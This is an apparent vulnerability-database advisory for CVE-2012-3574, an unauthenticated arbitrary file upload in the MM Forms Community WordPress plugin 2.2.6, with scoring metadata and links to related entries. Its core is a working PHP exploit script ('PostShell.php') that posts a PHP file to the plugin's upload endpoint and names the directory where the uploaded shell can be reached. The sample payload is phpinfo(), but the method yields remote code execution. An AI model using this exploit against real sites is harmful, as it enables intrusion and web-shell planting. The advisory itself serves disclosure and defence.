Lucene search
WpvulndbWPEX-ID:D63EE057-6B4E-4FFC-9FBF-76C2C9CA20CCHistoryJun 07, 2012 - 12:00 a.m.
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
2012-06-0700:00:00
wpvulndb
12
0.271 Low
EPSS
Percentile
96.8%
Attackers have been seen probing for the “/wp-content/plugins/mm-forms/includes/doajaxfileupload.php” file.
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.example.com/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output
lo.php:
<?php
phpinfo();
?>References
Related
wpvulndb
wpvulndb
MM Forms & MM Forms Community 2.2.6 - Unauthenticated Arbitrary File Upload
2012-06-07 00:00:00
nvd
nvd
CVE-2012-3574
2012-06-16 00:55:07
cve
cve
CVE-2012-3574
2012-06-16 00:55:07
prion
prion
Unrestricted file upload
2012-06-16 00:55:00
cvelist
cvelist
CVE-2012-3574
2012-06-16 00:00:00
patchstack
patchstack
WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload
2012-06-06 00:00:00
WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload
2012-06-06 00:00:00